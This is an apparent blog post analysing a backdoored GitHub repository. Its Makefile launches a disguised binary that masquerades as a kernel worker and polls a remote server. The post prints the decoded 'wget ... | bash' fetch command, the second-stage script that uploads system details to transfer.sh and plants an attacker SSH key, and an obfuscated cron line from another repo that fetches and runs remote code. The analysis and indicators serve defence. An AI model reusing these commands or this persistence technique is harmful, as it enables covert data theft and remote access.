Update 2023/07/06: The github account hosting the backdoor has been nuked

On twitter I saw this tweet that warns users of a backdoor in a git repo. I wanted to check it out and see what was happening.

# Initial Analysis

If we checkout the repo and look into the Makefile, we see it executes the following binary:

.PHONY: all clean


SOURCES = $(wildcard src/*.c)
HEADERS = $(wildcard inc/*.h)
OBJECTS = $(patsubst src/%.c,obj/%.o,$(SOURCES))

CFLAGS= -I./inc
LDFLAGS= -pthread -static

all: obj $(TARGET) get_root

        $(CC) $(LDFLAGS) -o $@ $^
        strip $@

obj/%.o: src/%.c
        $(CC) -c $< -o $@ $(CFLAGS)

        mkdir obj

get_root: get_root_src/get_root.c
        $(CC) -o $@ $^
        rm -fr get_root

        rm -fr getroot
        rm -rf obj
        rm -f $(TARGET)

Note the line ./src/aclocal.m4. So lets checkout the file!

$ file src/aclocal.m4 
src/aclocal.m4: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=9fc8befaa32a1a88133dd077db0369576313e6d2, for GNU/Linux 3.2.0, stripped

Only x86 users have to worry about this.

Lets checkout the binary in ghidra.

# Static Analysis

The first thing it does is check the current name of the executable against kworker by building a string two characters at a time.

  i = strlen((char *)&kworker);
  (&kworker + i) = 0x776b;
  (&kworker + i + 2) = 0;
  i = strlen((char *)&kworker);
  (&kworker + i) = 0x726f;
  (&kworker + i + 2) = 0;
  i = strlen((char *)&kworker);
  (&kworker + i) = 0x656b;
  (&kworker + i + 2) = 0;
  i = strlen((char *)&kworker);
  (&kworker + i) = 0x72;
	/* kworker */
  iVar1 = check_self_name((char **)*param_2,&kworker);

If the check is bad, it will copy itself to a new file under the user’s home $HOME/.local/kworker and re-execute itself from there.

However, if the check is good, it will open and lock a copy of /tmp/.ICE-unix.pid and check the status of the lock. If the file has not been locked, it continues. This allows it to ensure only one copy of itself is running.

Once going further, it changes the current argv[0] to [kworker/8:3] further masking itself from process inspection (this will cause ps to report the name as [kworker/8:3]), then forks itself and runs the following function once every two minutes.

undefined8 do_curl(void)

  undefined8 uVar1;
  size_t sVar2;
  undefined8 local_78;
  undefined8 local_70;
  undefined8 local_68;
  undefined8 local_60;
  char *data_buf;
  ulong size;
  char *local_40;
  int local_38;
  undefined4 local_34;
  undefined4 local_30;
  undefined4 local_2c;
  undefined8 local_28;
  void *local_20;
  undefined4 local_14;
  ulong i;
  data_buf = (char *)malloc(1);
  size = 0;
  local_14 = 0x27;
  local_20 = (void *)realloc(&http_string,0x27);
  local_28 = curl_easy_init();
  local_2c = 0x2712;
  local_30 = 0x4e2b;
  local_34 = 0x2711;
  local_38 = curl_easy_perform(local_28);
  if (size < 2) {
    uVar1 = 0;
  else {
    if (local_38 == 0) {
      local_40 = (char *)malloc(size + 0x40);
      data_buf[size] = '\0';
      for (i = 0; i < size; i = i + 1) {
        data_buf[i] = xor_key ^ data_buf[i];
      if ((size != 0) && (data_buf[size - 1] == '\n')) {
        data_buf[size - 1] = '\0';
      snprintf(local_40,size + 0x40,(char *)&local_78,data_buf);
    uVar1 = curl_global_cleanup();
  return uVar1;

# Dynamic Analysis

Lets load it in GDB and see what it downloads. We can break on most of the checks and modify the values its checking in order to not lose the executable, however once it forks, in order to keep following it you must run the following gdb command: set follow-fork-mode child to debug it properly, step through it after this.

I also patched out the call to sleep to not have to wait.

In here, we allocate a buffer and store the string http://cunniloss.accesscam.org/hash.php to make a request to using libcurl.

Unfortunately, the dns entry for the site had been removed (or at least I was getting no responses to my lookups!). Using https://securitytrails.com/domain/cunniloss.accesscam.org/dns I was able to find the A record associated with the name, and patched my hosts file accordingly. After doing that, we successfully download data from the server. After it is retreived from the server, it is XOR’d with the static byte 0x83. Here it is un-xor’d in memory:

gef  xor-memory display 0x000055555558fef0 0x55 0x83
[+] Displaying XOR-ing 0x55555558fef0-0x55555558ff45 with '0x83'
─────────────────────────────────────── Original block ───────────────────────────────────────────────────────────
0x000055555558fef0     f4 e4 e6 f7 a3 ae f2 a3 ae cc a3 ae a3 a1 eb f7    ................
0x000055555558ff00     f7 f3 b9 ac ac e0 f6 ed ed ea ef ec f0 f0 ad e2    ................
0x000055555558ff10     e0 e0 e6 f0 f0 e0 e2 ee ad ec f1 e4 ac e7 ec ad    ................
0x000055555558ff20     f3 eb f3 bc f6 be a7 ab f4 eb ec e2 ee ea aa a5    ................
0x000055555558ff30     eb be a7 ab eb ec f0 f7 ed e2 ee e6 aa a1 a3 ff    ................
0x000055555558ff40     a3 e1 e2 f0 eb    .....
──────────────────────────────────────── XOR-ed block ────────────────────────────────────────────────────────────
0x000055555558fef0     77 67 65 74 20 2d 71 20 2d 4f 20 2d 20 22 68 74    wget -q -O - "ht
0x000055555558ff00     74 70 3a 2f 2f 63 75 6e 6e 69 6c 6f 73 73 2e 61    tp://cunniloss.a
0x000055555558ff10     63 63 65 73 73 63 61 6d 2e 6f 72 67 2f 64 6f 2e    ccesscam.org/do.
0x000055555558ff20     70 68 70 3f 75 3d 24 28 77 68 6f 61 6d 69 29 26    php?u=$(whoami)&
0x000055555558ff30     68 3d 24 28 68 6f 73 74 6e 61 6d 65 29 22 20 7c    h=$(hostname)" |
0x000055555558ff40     20 62 61 73 68                                     bash

So we can see it uses wget to get a second stage payload, so lets grab it and check it out! After wget, here is what was downloaded.


rm -fr $OUT
mkdir -p ~/.ssh/

if [ ! -e $AUTH ]; then
        touch $AUTH

echo "================================================================" >> $OUT
uname -a >> $OUT
echo "================================================================" >> $OUT
uptime >> $OUT
echo "================================================================" >> $OUT
ls -LR ~/ >> $OUT
echo "================================================================" >> $OUT
ps -ef >> $OUT
echo "================================================================" >> $OUT
mount >> $OUT
echo "================================================================" >> $OUT


RET1=$(curl -s  --insecure --upload-file $OUT https://transfer.sh/$H-$U.txt)
#curl -s -o /dev/null http://cunniloss.accesscam.org/term.php?term=$RET

#import -window root -delay 200 $SCR
#RET2=$(curl -s  --insecure --upload-file $SCR https://transfer.sh/$H-$U.png)

curl -s -o /dev/null "http://cunniloss.accesscam.org/term.php?term=$RET1"

#tar cvzf $TAR ~/
#RET=$(curl -s  --insecure --upload-file $TAR https://transfer.sh/$H-$U.tar.gz)
#curl -s -o /dev/null http://cunniloss.accesscam.org/term.php?term=$RET

rm -fr $OUT
rm -fr $TAR

grep -q "fhxrs43hp464A1sarVJbmsV8OaaUzASJT9EA" $AUTH
if [ $? -ne 0 ]; then
        echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXEkpzHQ0OniUTP8fhxrs43hp464A1sarVJbmsV8OaaUzASJT9EAF565OK7oBFvYRP6yx4U6BWjjsot7TMOW/ORiST2bAH7q+b6tLO0MnKKnZwpa1bDJYFXJ5ZHEiUyvPLydXvOB6YlL4YfRaxXqsVFwHTlscKUc8eyCOXmn4G0IeeJmgHbgoTL6x8yD0ExvFOseN9hJCK6dSOAQhEM2FRKUqnjbiPavMrHGHcLvqd7wTLNKE1i5cPn4bdGcEtWKbMTjf2hnUuJMxeQuyuCJh2+n9WUUdceO/KcaKkiAJ49z4ayL9fHHd5VcIhmTnkr1ECiTFRhwa/3tW/T6lL9RcaczztKnNE3Si8cYV681cIYePM8SuNJkcMdWFb7X2cyBJ8AMSj+y44RHIk4bSKZwwpBMUyQAV22gBLOFtMSTOsG6JUfvw55nG8I9VJZXvuguK1kEasjEEFnqNnGOu+tdt+yva9TD7yCe2KOHEqND1i1HZYLgRDwkd3E5ntSG2I9xs= root@pulsar >> $AUTH

touch -r /etc/passwd $AUTH

Some stuff is commented patched out, maybe different versions get sent based upon what OS / system is detects you are running. But all it does is exfil some data and drop an ssh key, then update the filetime of the .authorized-keys file.

# IOC’s



# Files

/tmp/.ICE-unix.pid $HOME/.local/kworker

# Processes


# IPs

# Hash

SHA256: caa69b10b0bfca561dec90cbd1132b6dcb2c8a44d76a272a0b70b5c64776ff6c MD5: 7847d26ff86284dce7c3caf3de69a129

# File contents

.ssh/authorized_keys: fhxrs43hp464A1sarVJbmsV8OaaUzASJT9EA

# Misc

Further checking out the user CrisSanders22 on github reveals that ALL his repositories have backdoors in them! For example, https://github.com/ChriSanders22/BotScanner has been up for 4 years, which on line 189 of scanner.sh has the fun encoded cronjob embedded inside it:

echo "*/1?*?*?*?*????root???$w?-q?-O?-?signaturesktwilightparadoxkcomjhashkphp?|?bash?>?jdevjnull" | tr -s "?" " " | tr -s "j" "/" | tr -s "k" "." `. 

Finally, I went and checked all the emails used on commits on his repo’s, and found the following email cris.sanders22@gmail.com , which is associated with a similar tor relay email under cris.sanders22@protonmail.com. Interesting, though, anyone can set those values to be anything, might not mean much.